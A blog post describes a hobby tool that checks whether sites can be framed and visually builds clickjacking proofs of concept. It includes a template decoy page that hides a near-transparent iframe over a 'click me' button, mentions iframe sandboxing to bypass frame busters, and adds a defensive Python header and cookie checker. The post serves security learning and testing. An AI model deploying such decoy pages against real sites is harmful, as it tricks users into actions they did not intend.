Clickjacker Analyzer and PoC Generator

2026/01/22

Categories: Projects

So, while learning about web vulnerabilities, I learned a bit about clickjacking. It’s a very straightforward vulnerability: if a site can be iframed and the user can commit state-changing actions with a click or a few clicks, then you can trick the user into doing said state-changing actions with a decoy page and an invisible iframe. A classic example of this is the “WIN A PRIZE!” flashy site that required you to click on a button while an iframe with a Facebook page would be over it, right over where the “Like” button would be. It’s so direct that the only HTML code it requires most of the time is the following:

<head>
	<style>
		#target_website {
			position:relative;
			width:{{some_width}};
			height:{{some_height}};
			opacity:0.00001;
			z-index:2;
			}
		#decoy_website {
			position:absolute;
			top:{{decoy_width}};
			left:{{decoy_height}};
			z-index:1;
			}
	</style>
</head>

<body>
	<div id="decoy_website">
    BIG FLASHY BUTTON HERE!!! CLICK ME!! YOU MUST CLICK ME!!
	</div>
	<iframe id="target_website" src="https://vulnerable-website.com">
	</iframe>
</body>

Even though it is very straightforward, building a proof of concept for this vulnerability can be a pain since it requires a lot of manual calibration with CSS, as can be seen from the code. For this reason, I built a visual calibrator for easy PoC generation. This way, instead of adjusting CSS, you can adjust the iframe visually right over the decoy button.

Clickjack Analyzer and PoC Generator GIF

Features

Vulnerability analyzer

I’ve included a script that detects if a site is vulnerable to clickjacking by analyzing its HTTP headers, specifically X-Frame-Options and Content-Security-Policy, to verify if the site can be framed. It also analyzes the site’s cookies to verify if requests generated from a frame are considered valid.
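A minimal version of these header checks, written from the site owner's side, as an added example rather than the project's own script. The function names and sample headers are constructed here, and when several CSP headers are present the strictest `frame-ancestors` policy is treated as decisive.

```python
def frame_ancestors(csp):
    """Return the frame-ancestors source list of one CSP header, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def framing_policy(headers):
    """Classify who may frame the response: 'none', 'self', 'allowlist' or 'any'."""
    policies = [p for n, v in headers if n.lower() == "content-security-policy"
                for p in [frame_ancestors(v)] if p is not None]
    if policies:
        # frame-ancestors takes precedence over X-Frame-Options in current browsers.
        if any(p in ([], ["'none'"]) for p in policies):
            return "none"
        if any(p == ["'self'"] for p in policies):
            return "self"
        if all(any(s in ("*", "http:", "https:") for s in p) for p in policies):
            return "any"
        return "allowlist"
    xfo = [v.strip().upper() for n, v in headers if n.lower() == "x-frame-options"]
    if "DENY" in xfo or "SAMEORIGIN" in xfo:
        return "none" if "DENY" in xfo else "self"
    return "any"  # header absent, invalid, or obsolete ALLOW-FROM (ignored by browsers)

def cookie_samesite(headers):
    """Map each Set-Cookie name to its SameSite value, 'unset' when missing."""
    result = {}
    for value in (v for n, v in headers if n.lower() == "set-cookie"):
        pair, *attrs = value.split(";")
        samesite = "unset"  # the effective default then depends on the browser
        for attr in attrs:
            key, _, val = attr.strip().partition("=")
            if key.lower() == "samesite" and val.strip():
                samesite = val.strip().lower()
        result[pair.split("=", 1)[0].strip()] = samesite
    return result

# Constructed sample response headers (not captured from a real site).
WEAK = [
    ("X-Frame-Options", "ALLOW-FROM https://partner.example"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=None"),
    ("Set-Cookie", "prefs=dark; Path=/"),
]
HARDENED = [
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]
```

A response classified as `any` whose session cookie is `SameSite=None` is the combination to fix first: the page can be framed cross-site and the framed request still carries the session.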

PoC generator

A visual PoC generator where you can drag and resize the iframe with the target site right over the decoy.

Decoy templates

Sandboxing

Lets you sandbox the iframe in order to bypass frame busters.

Conclusions

Overall, I really liked working on this. I learned a lot about HTTP headers and social engineering. Hopefully it’ll be useful for anyone who wants to build a quick PoC for clickjacking.

Check out the source here